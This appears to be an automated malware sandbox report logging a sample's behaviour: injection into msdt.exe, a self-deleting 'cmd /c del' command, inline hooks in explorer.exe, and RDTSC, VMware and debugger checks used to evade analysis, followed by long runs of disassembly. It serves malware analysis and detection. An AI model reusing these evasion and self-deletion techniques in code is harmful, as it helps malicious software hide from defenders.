          Source: unknownProcess created: C:\Users\user\Desktop\5SXTKXCnqS.exe 'C:\Users\user\Desktop\5SXTKXCnqS.exe'
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess created: C:\Users\user\Desktop\5SXTKXCnqS.exe 'C:\Users\user\Desktop\5SXTKXCnqS.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5SXTKXCnqS.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess created: C:\Users\user\Desktop\5SXTKXCnqS.exe 'C:\Users\user\Desktop\5SXTKXCnqS.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5SXTKXCnqS.exe'Jump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.288397745.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: 5SXTKXCnqS.exe, 00000002.00000002.315714674.0000000002A80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5SXTKXCnqS.exe, 00000000.00000003.236649402.0000000009AA0000.00000004.00000001.sdmp, 5SXTKXCnqS.exe, 00000002.00000003.237181560.0000000000660000.00000004.00000001.sdmp, msdt.exe, 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5SXTKXCnqS.exe, msdt.exe
          Source: Binary string: msdt.pdb source: 5SXTKXCnqS.exe, 00000002.00000002.315714674.0000000002A80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.288397745.0000000006FE0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeUnpacked PE file: 2.2.5SXTKXCnqS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_73CA2F60 push eax; ret 0_2_73CA2F8E
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041D82F push dword ptr [3253D521h]; ret 2_2_0041DD9A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00417A8C push eax; retf 2_2_00417A8D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00407B24 push ss; retf 2_2_00407B2D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00407CB2 push edx; retf 2_2_00407CB9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041CEF2 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041CEFB push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_004176A2 pushfd ; retf 2_2_004176A3
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041CEA5 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_004176BA push ds; ret 2_2_004176C8
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041CF5C push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A0D0D1 push ecx; ret 2_2_00A0D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BED0D1 push ecx; ret 14_2_04BED0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00737A8C push eax; retf 14_2_00737A8D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00727B24 push ss; retf 14_2_00727B2D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00727CB2 push edx; retf 14_2_00727CB9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073DD8E push dword ptr [3253D521h]; ret 14_2_0073DD9A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073CEF2 push eax; ret 14_2_0073CEF8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073CEFB push eax; ret 14_2_0073CF62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_007376BA push ds; ret 14_2_007376C8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_007376A2 pushfd ; retf 14_2_007376A3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073CEA5 push eax; ret 14_2_0073CEF8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073CF5C push eax; ret 14_2_0073CF62
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile created: C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000007298E4 second address: 00000000007298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000729B4E second address: 0000000000729B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Windows\explorer.exe TID: 1780Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\AppData\Local\Temp\wkxohdeyqvvyrJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\AppData\Local\Temp\02vqprgl0atfidcJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsaC26D.tmpJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\Desktop\5SXTKXCnqS.exeJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: explorer.exe, 00000003.00000000.261160747.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.269032429.000000000DC20000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.260495097.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.261160747.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.245467885.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.284504790.00000000053A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000003.00000000.274452348.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000003.00000000.261865625.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000000.253870774.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.260495097.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.260495097.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.261865625.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000003.00000000.260495097.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9080 mov eax, dword ptr fs:[00000030h]2_2_009B9080
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EF0BF mov ecx, dword ptr fs:[00000030h]2_2_009EF0BF
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EF0BF mov eax, dword ptr fs:[00000030h]2_2_009EF0BF
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EF0BF mov eax, dword ptr fs:[00000030h]2_2_009EF0BF
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A33884 mov eax, dword ptr fs:[00000030h]2_2_00A33884
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A33884 mov eax, dword ptr fs:[00000030h]2_2_00A33884
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F90AF mov eax, dword ptr fs:[00000030h]2_2_009F90AF
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A0 mov eax, dword ptr fs:[00000030h]2_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A0 mov eax, dword ptr fs:[00000030h]2_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A0 mov eax, dword ptr fs:[00000030h]2_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A0 mov eax, dword ptr fs:[00000030h]2_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A0 mov eax, dword ptr fs:[00000030h]2_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A0 mov eax, dword ptr fs:[00000030h]2_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A4B8D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00A4B8D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A4B8D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A4B8D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A4B8D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A4B8D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B58EC mov eax, dword ptr fs:[00000030h]2_2_009B58EC
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E002D mov eax, dword ptr fs:[00000030h]2_2_009E002D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E002D mov eax, dword ptr fs:[00000030h]2_2_009E002D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E002D mov eax, dword ptr fs:[00000030h]2_2_009E002D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E002D mov eax, dword ptr fs:[00000030h]2_2_009E002D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E002D mov eax, dword ptr fs:[00000030h]2_2_009E002D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A37016 mov eax, dword ptr fs:[00000030h]2_2_00A37016
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A37016 mov eax, dword ptr fs:[00000030h]2_2_00A37016
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A37016 mov eax, dword ptr fs:[00000030h]2_2_00A37016
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CB02A mov eax, dword ptr fs:[00000030h]2_2_009CB02A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CB02A mov eax, dword ptr fs:[00000030h]2_2_009CB02A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CB02A mov eax, dword ptr fs:[00000030h]2_2_009CB02A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CB02A mov eax, dword ptr fs:[00000030h]2_2_009CB02A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A84015 mov eax, dword ptr fs:[00000030h]2_2_00A84015
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A84015 mov eax, dword ptr fs:[00000030h]2_2_00A84015
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D0050 mov eax, dword ptr fs:[00000030h]2_2_009D0050
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D0050 mov eax, dword ptr fs:[00000030h]2_2_009D0050
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A72073 mov eax, dword ptr fs:[00000030h]2_2_00A72073
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A81074 mov eax, dword ptr fs:[00000030h]2_2_00A81074
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A369A6 mov eax, dword ptr fs:[00000030h]2_2_00A369A6
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2990 mov eax, dword ptr fs:[00000030h]2_2_009E2990
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EA185 mov eax, dword ptr fs:[00000030h]2_2_009EA185
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A351BE mov eax, dword ptr fs:[00000030h]2_2_00A351BE
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A351BE mov eax, dword ptr fs:[00000030h]2_2_00A351BE
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A351BE mov eax, dword ptr fs:[00000030h]2_2_00A351BE
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A351BE mov eax, dword ptr fs:[00000030h]2_2_00A351BE
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DC182 mov eax, dword ptr fs:[00000030h]2_2_009DC182
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E61A0 mov eax, dword ptr fs:[00000030h]2_2_009E61A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E61A0 mov eax, dword ptr fs:[00000030h]2_2_009E61A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A441E8 mov eax, dword ptr fs:[00000030h]2_2_00A441E8
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BB1E1 mov eax, dword ptr fs:[00000030h]2_2_009BB1E1
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BB1E1 mov eax, dword ptr fs:[00000030h]2_2_009BB1E1
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BB1E1 mov eax, dword ptr fs:[00000030h]2_2_009BB1E1
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9100 mov eax, dword ptr fs:[00000030h]2_2_009B9100
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9100 mov eax, dword ptr fs:[00000030h]2_2_009B9100
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9100 mov eax, dword ptr fs:[00000030h]2_2_009B9100
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E513A mov eax, dword ptr fs:[00000030h]2_2_009E513A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E513A mov eax, dword ptr fs:[00000030h]2_2_009E513A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D4120 mov eax, dword ptr fs:[00000030h]2_2_009D4120
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D4120 mov eax, dword ptr fs:[00000030h]2_2_009D4120
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D4120 mov eax, dword ptr fs:[00000030h]2_2_009D4120
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D4120 mov eax, dword ptr fs:[00000030h]2_2_009D4120
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D4120 mov ecx, dword ptr fs:[00000030h]2_2_009D4120
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DB944 mov eax, dword ptr fs:[00000030h]2_2_009DB944
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DB944 mov eax, dword ptr fs:[00000030h]2_2_009DB944
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BB171 mov eax, dword ptr fs:[00000030h]2_2_009BB171
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BB171 mov eax, dword ptr fs:[00000030h]2_2_009BB171
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BC962 mov eax, dword ptr fs:[00000030h]2_2_009BC962
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009ED294 mov eax, dword ptr fs:[00000030h]2_2_009ED294
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009ED294 mov eax, dword ptr fs:[00000030h]2_2_009ED294
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CAAB0 mov eax, dword ptr fs:[00000030h]2_2_009CAAB0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CAAB0 mov eax, dword ptr fs:[00000030h]2_2_009CAAB0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EFAB0 mov eax, dword ptr fs:[00000030h]2_2_009EFAB0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B52A5 mov eax, dword ptr fs:[00000030h]2_2_009B52A5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B52A5 mov eax, dword ptr fs:[00000030h]2_2_009B52A5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B52A5 mov eax, dword ptr fs:[00000030h]2_2_009B52A5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B52A5 mov eax, dword ptr fs:[00000030h]2_2_009B52A5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B52A5 mov eax, dword ptr fs:[00000030h]2_2_009B52A5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2ACB mov eax, dword ptr fs:[00000030h]2_2_009E2ACB
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2AE4 mov eax, dword ptr fs:[00000030h]2_2_009E2AE4
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D3A1C mov eax, dword ptr fs:[00000030h]2_2_009D3A1C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B5210 mov eax, dword ptr fs:[00000030h]2_2_009B5210
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B5210 mov ecx, dword ptr fs:[00000030h]2_2_009B5210
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B5210 mov eax, dword ptr fs:[00000030h]2_2_009B5210
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B5210 mov eax, dword ptr fs:[00000030h]2_2_009B5210
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BAA16 mov eax, dword ptr fs:[00000030h]2_2_009BAA16
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BAA16 mov eax, dword ptr fs:[00000030h]2_2_009BAA16
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C8A0A mov eax, dword ptr fs:[00000030h]2_2_009C8A0A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F4A2C mov eax, dword ptr fs:[00000030h]2_2_009F4A2C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F4A2C mov eax, dword ptr fs:[00000030h]2_2_009F4A2C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A6B260 mov eax, dword ptr fs:[00000030h]2_2_00A6B260
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A6B260 mov eax, dword ptr fs:[00000030h]2_2_00A6B260
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A88A62 mov eax, dword ptr fs:[00000030h]2_2_00A88A62
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9240 mov eax, dword ptr fs:[00000030h]2_2_009B9240
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9240 mov eax, dword ptr fs:[00000030h]2_2_009B9240
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9240 mov eax, dword ptr fs:[00000030h]2_2_009B9240
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B9240 mov eax, dword ptr fs:[00000030h]2_2_009B9240
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F927A mov eax, dword ptr fs:[00000030h]2_2_009F927A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7EA55 mov eax, dword ptr fs:[00000030h]2_2_00A7EA55
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A44257 mov eax, dword ptr fs:[00000030h]2_2_00A44257
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2397 mov eax, dword ptr fs:[00000030h]2_2_009E2397
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A85BA5 mov eax, dword ptr fs:[00000030h]2_2_00A85BA5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EB390 mov eax, dword ptr fs:[00000030h]2_2_009EB390
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C1B8F mov eax, dword ptr fs:[00000030h]2_2_009C1B8F
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C1B8F mov eax, dword ptr fs:[00000030h]2_2_009C1B8F
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A6D380 mov ecx, dword ptr fs:[00000030h]2_2_00A6D380
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7138A mov eax, dword ptr fs:[00000030h]2_2_00A7138A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E4BAD mov eax, dword ptr fs:[00000030h]2_2_009E4BAD
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E4BAD mov eax, dword ptr fs:[00000030h]2_2_009E4BAD
